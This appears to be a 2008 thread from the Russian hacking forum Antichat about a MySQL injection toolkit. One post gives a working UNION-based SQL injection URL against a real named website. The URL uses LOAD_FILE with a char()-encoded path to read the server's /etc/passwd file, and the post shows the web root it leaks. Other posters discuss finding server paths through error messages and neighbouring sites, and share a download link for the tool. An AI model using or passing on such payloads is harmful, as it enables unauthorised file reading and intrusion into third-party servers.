Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Toolkit для работы с mysql inj от меня (https://forum.antichat.xyz/showthread.php?t=60802)

Sleep 10.03.2008 01:12

путь самому прописывать в форму
а полный путь до сайта на серве можно поглядеть в файле etc/passwd
еще не разу не видал чтобы чтение passwd было запрещено

Piflit 10.03.2008 01:26

Цитата:

Сообщение от Sleep
путь самому прописывать в форму

а можно в адресную строку. и нажать enter. и все

Цитата:

Сообщение от Sleep
а полный путь до сайта на серве можно поглядеть в файле etc/passwd

может ты даже скажешь, как?)

Sleep 10.03.2008 02:03

Цитата:

может ты даже скажешь, как?)
к тому же чаще всего при скуле полный путь до скрипта выводится в ошибке
вот пример чтения файла `/etc/passwd`
PHP код:

http://www.hardvision.ru/?dir=news&action=internet&id=-1+union+select+1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8/* 

/home/site/hardvision.ru/

guest3297 10.03.2008 02:40

бугога сори не удиржался....

Piflit 10.03.2008 20:44

Цитата:

Сообщение от [ cash ]
бугога сори не удиржался....

+1

Sleep явно не в теме

heks 12.03.2008 14:26

Цитата:

Сообщение от Piflit
+1

Sleep явно не в теме


С чего бы это не в теме? на счет LOAD_FILE это он прав. Надо добавить а как человек путь определит это его уже проблема. (пути можно определить и через другие сайты хотящиеся на этом сервере.)

Piflit 12.03.2008 21:25

Цитата:

Сообщение от heks
С чего бы это не в теме? на счет LOAD_FILE это он прав. Надо добавить а как человек путь определит это его уже проблема. (пути можно определить и через другие сайты хотящиеся на этом сервере.)

load_file был добавлен в последней версии. следите за обновлениями

NOAkill 28.08.2008 00:31

Всем респект. Хотелось бы всё-же увидеть данный скрипт. Ссылка вроде битая. Может кто в курсе, где можно слить?

[dword] 28.08.2008 00:49

Цитата:

Сообщение от NOAkill
Всем респект. Хотелось бы всё-же увидеть данный скрипт. Ссылка вроде битая. Может кто в курсе, где можно слить?

Ссылка не битая, но перекинул сюда http://dump.ru/file_catalog/1024852

diehard 23.09.2008 04:49

Можно как-нибудь перезалить сабж?


Время: 01:36